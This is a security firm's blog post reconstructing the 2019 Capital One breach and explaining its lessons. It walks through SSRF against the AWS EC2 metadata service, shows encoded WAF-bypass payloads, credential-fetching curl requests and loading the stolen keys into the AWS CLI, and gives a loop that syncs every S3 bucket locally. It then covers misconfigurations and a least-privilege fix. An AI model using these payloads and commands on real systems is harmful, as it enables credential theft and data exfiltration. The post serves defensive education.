This post attempts to explain the technical side of how the Capital One breach occurred, the impact of the breach and what you can do as a user of cloud services to prevent this from happening to you.
Updated 3rd December 2019 — Please note: AWS has released additional security defences against the attack described in this blog post. While the methods described here work against the legacy version of the Instance Metadata Service (IMDSv1), they are thwarted by IMDSv2. Read our extensive blog post on how to use AWS EC2 IMDSv2 and add these additional defences to your EC2 machines.
On July 29th, Capital One Financial Corporation announced that they had determined there was unauthorised access by an outside individual who obtained certain types of personal information relating to people who had applied for its credit card products and to Capital One credit card customers.
This event affected approximately 100 million individuals in the United States and approximately 6 million in Canada. The hacker gained access to data that included approximately 140,000 Social Security numbers and approximately 80,000 bank account numbers on U.S. consumers, and roughly 1 million Social Insurance Numbers (SINs) for Canadian credit card customers.
What happened from a technical viewpoint
The following is a reconstruction of the attack and a technical walk-through of what happened, as uncovered in the investigation. A copy of the criminal complaint can be found at https://www.justice.gov/usao-wdwa/press-release/file/1188626/download
- On July 19, 2019, a security researcher got in touch with Capital One via its responsible disclosure email address, notifying them of a public GitHub gist that contained a description of the attack: the target that was attacked, the commands that were run, and the list of AWS S3 buckets containing the stolen data
- The attack itself, obtaining the keys, gaining access to S3 and downloading the data, happened on March 22 and 23, 2019
The attacker gained access to a set of AWS access keys by reaching the AWS EC2 metadata service via an SSRF vulnerability. There is evidence that the targeted application was behind a Web Application Firewall (ModSecurity), but either a bypass was used or the WAF was not configured to block attacks (logging mode). The keys allowed the attacker to list the S3 buckets and sync them to a local disk, thereby providing access to all the data contained in them.
In the security industry, amongst security researchers and bug bounty hunters, SSRF or Server Side Request Forgery is an extremely lucrative bug, especially when the infrastructure being targeted is in the cloud. SSRF occurs when user-supplied input is used by the server to make a network/HTTP request to a destination the user controls. So if an application or service accepts a URL, IP address or hostname from which it is supposed to fetch data, and you control this input, it could be vulnerable to SSRF. Hackerone has a nice article explaining this in more detail.
When a web application hosted on a cloud VM instance (true for AWS, GCP, Azure, DigitalOcean etc.) is vulnerable to SSRF, it becomes possible to reach an endpoint accessible only from the machine itself, called the metadata endpoint. For AWS, no additional headers are required, and a request to the fixed address http://169.254.169.254/ returns metadata about the instance. Since this endpoint is reachable only from the machine itself, you would normally need a shell on the machine to run a curl or wget against it; the same is true for any service or program running on the machine. An SSRF therefore allows an external attacker to access the endpoint, because the request originates from the machine (server side) while the output is returned to the attacker's browser/client.
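To illustrate (this transcript is not from the complaint), this is what querying the metadata service looks like from a shell on an EC2 instance; with IMDSv1 a plain unauthenticated GET is all that is needed:

```shell
# Works only from the instance itself (or via an SSRF originating there).
# With IMDSv1 no special headers are required.
curl http://169.254.169.254/latest/meta-data/
# Returns a plain-text listing of metadata categories, e.g.
# ami-id, hostname, iam/, instance-id, local-ipv4, public-ipv4, ...
```

An SSRF simply lets an attacker cause the vulnerable application to make this same request on their behalf.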
You can read more about the Metadata Service for AWS here — https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
Interestingly, an important piece of information that can be pulled from the instance metadata service is the set of temporary credentials for any IAM Role attached to the instance. This is available at `http://169.254.169.254/latest/meta-data/iam/security-credentials/<RoleName>`.
It appears that this role had excessive privileges, allowing the listing of and access to S3 storage. The attacker used these privileges to list the buckets and download their contents locally, and seems to have used Tor to hide their real IP address while doing so.
1. Accessing the credentials using the SSRF bug

- The attacker seems to have accessed the AWS credentials for a role called `ISRM-WAF-Role` via the endpoint `http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role`, using the SSRF bug.
For example, if the vulnerable application was at `http://example.com` and the SSRF existed in a GET parameter called `url`, then exploitation was possible via `http://example.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role`
Given that the role name contains the string `WAF`, it is speculated that the exploitation was not as straightforward as the URL above and that a bypass was used for the WAF (ModSecurity) in this case. Some common bypasses are available at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Request Forgery
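The exact payload used in this incident is not public. Generic bypasses from lists like the one above typically re-encode the metadata IP address so that a filter matching the literal string 169.254.169.254 never fires; for example:

```shell
# Direct form (blocked if the WAF matches on the literal IP):
#   http://example.com/?url=http://169.254.169.254/latest/meta-data/
# The same IPv4 address written as a single decimal integer:
#   http://example.com/?url=http://2852039166/latest/meta-data/
# IPv6-mapped form of the same address:
#   http://example.com/?url=http://[::ffff:169.254.169.254]/latest/meta-data/
```

Whether any of these particular forms was used here is speculation; they only illustrate why string-matching WAF rules are a weak defence against SSRF.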
A sample output of what is visible when the AWS credentials for an attached IAM role are requested via the instance metadata service is shown below.
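The response shape below follows the AWS documentation for the `security-credentials` endpoint; the role name is the one from the complaint, and all values are illustrative:

```shell
# Requesting the temporary credentials for the attached role (IMDSv1).
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role
# {
#   "Code" : "Success",
#   "LastUpdated" : "2019-03-22T18:23:58Z",
#   "Type" : "AWS-HMAC",
#   "AccessKeyId" : "ASIAXXXXXXXXXXXXXXXX",
#   "SecretAccessKey" : "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
#   "Token" : "XXXXXXXXX...",
#   "Expiration" : "2019-03-23T00:45:41Z"
# }
```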
2. Adding the credentials to the local AWS CLI
- Very likely the next step the attacker took was to add the discovered credentials to their local AWS CLI using the `aws configure` command. A key difference between credentials issued to an IAM User and those obtained for a role through the instance metadata service is the presence of a session token. This token cannot be added via the `aws configure` command directly; it needs to be set as the `AWS_SESSION_TOKEN` environment variable or added as `aws_session_token` to the credentials file using a text editor. A `~/.aws/credentials` file with an AWS CLI profile called `example` looks like this
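A minimal sketch of that step, with obviously fake values; appending the profile by hand (or with a heredoc, as below) is one way to get the `aws_session_token` line in place:

```shell
# Illustrative values only. Creates a profile named "example" including
# the session token that `aws configure` cannot set directly.
mkdir -p ~/.aws
cat >> ~/.aws/credentials <<'EOF'
[example]
aws_access_key_id = ASIAXXXXXXXXXXXXXXXX
aws_secret_access_key = XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
aws_session_token = XXXXXXXXX...
EOF
```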
3. Gaining access to the data in S3
Lastly, once the credentials are added, you can check that you are set up properly by making a call to AWS STS to verify your identity. The command to do this is `aws sts get-caller-identity --profile example`. Its output shows the user ID, the account number and the ARN (Amazon Resource Name). A sample output is shown below.

This command is akin to the `whoami` command pentesters use to figure out who they are on a system they have compromised (here, who the stolen AWS keys belong to).
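A sketch of what that looks like, with a placeholder account number; for a role assumed via an EC2 instance profile, the role session name in the ARN is the instance ID (the real values were of course different):

```shell
aws sts get-caller-identity --profile example
# {
#     "UserId": "AROAXXXXXXXXXXXXXXXXX:i-0abc123def456789ab",
#     "Account": "123456789012",
#     "Arn": "arn:aws:sts::123456789012:assumed-role/ISRM-WAF-Role/i-0abc123def456789ab"
# }
```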
Once the AWS CLI was set up with the stolen keys and token, the attacker ran the command to list the buckets available in the account: `aws s3 ls --profile example`. For a properly restricted IAM role this command should have failed, but in this case the IAM Role had permissions it should not have had.
This lists the names of all the S3 buckets in the account that the IAM Role can see (which in this case was all of them). The attacker then ran the sync command to download the contents of over 700 S3 buckets locally. For example, an S3 sync command the attacker ran would have looked like this: `aws s3 sync s3://bucket-credit-card-numbers /home/attacker/localstash/capitalone/ --profile example`
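The listing and bulk download described above can be sketched as a short loop. This is a hedged reconstruction with assumed local paths, not the attacker's actual commands:

```shell
# List every bucket visible to the stolen "example" profile,
# then mirror each one to local disk.
for bucket in $(aws s3 ls --profile example | awk '{print $3}'); do
  aws s3 sync "s3://${bucket}" "/home/attacker/localstash/capitalone/${bucket}" --profile example
done
```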
Points of failure
There were multiple misconfigurations and lapses in configuration and programming that allowed this breach to succeed. The ones evident from what is available now in various records are:
- An application code review or vulnerability assessment should have caught the SSRF bug in the web application. One of the more common weaknesses we discover in web applications running in the cloud is the application's trust in user-supplied data when making requests from the server. Sometimes the application accepts a file name as user input, but providing a complete URL causes a web request to be triggered instead of a local file being read. In other cases, a bug like command injection allows an attacker to terminate the current command and execute a curl or wget from the server. In any case, if user input is used on the server without making sure it is safe in the context in which it is processed, a vulnerability will occur.
- Providing permissions to the `ISRM-WAF-Role` that were probably not needed. Unless required by the application or the instance to work with S3 buckets, S3-related permissions should not have been granted to the IAM Role, which would have made the leaked credentials far less useful. A key finding when we audit AWS cloud configurations for our customers is misconfigured roles and permissions. A lot of developers and Ops teams, just to make things work, still rely on the dangerous `"Effect": "Allow", "Action": "*", "Resource": "*"` policy, effectively giving the IAM Role AWS administrative rights.
- Data stored in AWS S3 was not encrypted. This probably would not have made a lot of difference here, especially since the IAM Role potentially had administrative permissions. The role would very likely have allowed the attacker to download even an SSE-KMS-encrypted object from the S3 buckets, as it would have had the necessary permission to use the AWS KMS key for decryption.
- Lastly, the absence of monitoring of IAM and AWS STS API calls with AWS CloudTrail, and of monitoring of S3 reads (or writes) given the sensitive nature of the data stored there. Ironically, Capital One is the creator of a tool called Cloud Custodian, actively used by many on the Internet, which can manage AWS, Azure and GCP environments by ensuring real-time compliance with security policies (like encryption and access requirements), tag policies, and cost management via garbage collection of unused resources and off-hours resource management.
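As a contrast to the wildcard policy quoted above, a least-privilege sketch (the bucket name is hypothetical) granting an instance role read access to a single bucket would look like this:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::example-app-bucket",
        "arn:aws:s3:::example-app-bucket/*"
      ]
    }
  ]
}
```

With a policy scoped like this, the stolen credentials would have exposed one bucket at most, and `aws s3 ls` across the account would have failed with an AccessDenied error.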
Final thoughts — this is not a new bug
This attack was particularly interesting to wake up to, because we at Appsecco have been teaching security testing teams and penetration testers how to discover, identify and exploit SSRF for over half a decade in our Xtreme Web Hacking class. For the last 3 years we have covered a variant of this in our “Breaking and Owning Applications and Servers on AWS and Azure” class (discover and exploit) and in our Automated Defence training that we run at BlackHat (how to automatically defend against this vulnerability in AWS).
Given the complexity of cloud services and the ease at which mis-configurations can occur because systems need to become usable and functional as soon as possible, it is important to approach cloud infrastructure with a defence in depth approach, especially when dealing with data whose unauthorised access can lead to legal issues and compliance failures.
If you want us to take a look at your cloud hosted web applications or your cloud architecture to simulate attacks and identify weaknesses before the bad guys do, get in touch with us.